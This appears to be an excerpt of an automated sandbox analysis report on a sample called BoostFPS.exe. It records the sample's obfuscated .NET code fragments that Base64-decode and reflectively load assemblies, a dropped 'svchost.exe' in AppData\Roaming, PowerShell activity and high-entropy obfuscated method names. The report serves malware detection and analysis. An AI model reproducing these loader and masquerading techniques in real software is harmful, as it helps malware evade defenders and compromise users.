                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: _1zq9ibfpkpsokscxU0
                  Source: C:\Users\user\Desktop\BoostFPS.exeCode function: 0_2_00007FF848DA00BD pushad ; iretd 0_2_00007FF848DA00C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA00BD pushad ; iretd 4_2_00007FF848DA00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848C6D2A5 pushad ; iretd 8_2_00007FF848C6D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D800BD pushad ; iretd 8_2_00007FF848D800C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E52316 push 8B485F94h; iretd 8_2_00007FF848E5231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848C6D2A5 pushad ; iretd 11_2_00007FF848C6D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D800BD pushad ; iretd 11_2_00007FF848D800C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848E52316 push 8B485F94h; iretd 11_2_00007FF848E5231B
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 21_2_00007FF848D900BD pushad ; iretd 21_2_00007FF848D900C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF848DB00BD pushad ; iretd 22_2_00007FF848DB00C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF848DA00BD pushad ; iretd 23_2_00007FF848DA00C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF848D700BD pushad ; iretd 24_2_00007FF848D700C1
                  Source: BoostFPS.exeStatic PE information: section name: .text entropy: 7.926723027968396
                  Source: BoostFPS.exe, KREREaf5y7YuM0yCltBL1aOyI5Yy16T9MMxdOrdO08a3tMGXNQCNV0oTCmPwJrOMb6GJ1MrKY0eKPJ6Qg4HLKBRSy3cVQWWeb.csHigh entropy of concatenated method names: '_1nv6xsW1urM51KjFSPwBcUyTAeRjRyF46vKXZMeFHs4A7PRGEsscBOjDn2Xncn36KOe5rDplWKrpqGiJThgNwowLnDEN6rPgg', 'jtTwwXEAHED9oqxfPQ9aqAl0UopKuwgC9Rp50rBfbSwU3q0YJkVFCb3WQl9BqnJYSij9rRCSWBxxxX12htBpfNo3pg9VBm5Wf', 'gF2fBNGaxlcrCYLIOZLMx28YLpFCshpxC0ei3XQYcDgENsx2k0M9XOayUdUBhRQNDSd3iYBwduak2VMqos4vwbgMfhvVRHvzl', 'TRo8s2i9LupJOU1g5dBnDcACrh4lvueIjb8yoxzZavQwZFhkCeeW6DHaaYz1eZQSaSEzReKPoXUeGLWjOL4wlHhZQ2rtzQUNp', '_6lY3QoPdC6sqzqd9qNzFgD4zr5QeS2874HFKe0yiXHnVjF5xxLufJqSExe8KWbXsh9ymCFoov0sPqI57LDbUIQ5kcnafKV5JA', 'mZJGnil2jrXOWrMebD0VfTI1TYhyijs49AfqByv', '_8pxTs4QG1U53CwZ4KZ4w1x4VhX5wxREgRmwtCL6', 'bH7TKT1kzsqFt43n0fyGx2qKw4iiPAE0ZT4Xr4G', 'wzR5JCtfvnEbCeD2PhhEFoXsxJvS9YURoKXyAVY', 'OWue4TRZnlqSL47JBDrBE747EN35Yf6LklfDHvF'
                  Source: BoostFPS.exe, sh0Wy3f9rsiwYQo33wxz2IicnooGc8DwvKLLKFNgivi2tV3gvLsTekeMpBSG6F8Cw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'LBj743MyvjDny3gYviNDMZtdgA23vn7R2uhm8Vo', 'x5UKoLHPg1L40Tx6eE2xekbsG0iSWM2tPr1q5ro', '_6s1nVJnNlpXUqo9i4QhjcjOjLVc1ToF7Y3GpjAx', 'RNTW68hT7PoGRy7dpuTml0v5IvKS4XZZudnKmRd'
                  Source: svchost.exe.0.dr, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.csHigh entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: svchost.exe.0.dr, b43LsePgKro8PAKsdWFwSRgXeS.csHigh entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: svchost.exe.0.dr, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
                  Source: svchost.exe.0.dr, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csHigh entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: svchost.exe.0.dr, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csHigh entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: svchost.exe.0.dr, 8IQB900HXYRJQlSr78JTfor2tc.csHigh entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: svchost.exe.0.dr, C3tzO69S7Io0iqQUFZ.csHigh entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csHigh entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: svchost.exe.0.dr, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.csHigh entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: svchost.exe.0.dr, fTao5gWD0t2iSxXg7i.csHigh entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.csHigh entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.csHigh entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, b43LsePgKro8PAKsdWFwSRgXeS.csHigh entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csHigh entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csHigh entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 8IQB900HXYRJQlSr78JTfor2tc.csHigh entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, C3tzO69S7Io0iqQUFZ.csHigh entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csHigh entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.csHigh entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, fTao5gWD0t2iSxXg7i.csHigh entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.csHigh entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.csHigh entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, b43LsePgKro8PAKsdWFwSRgXeS.csHigh entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
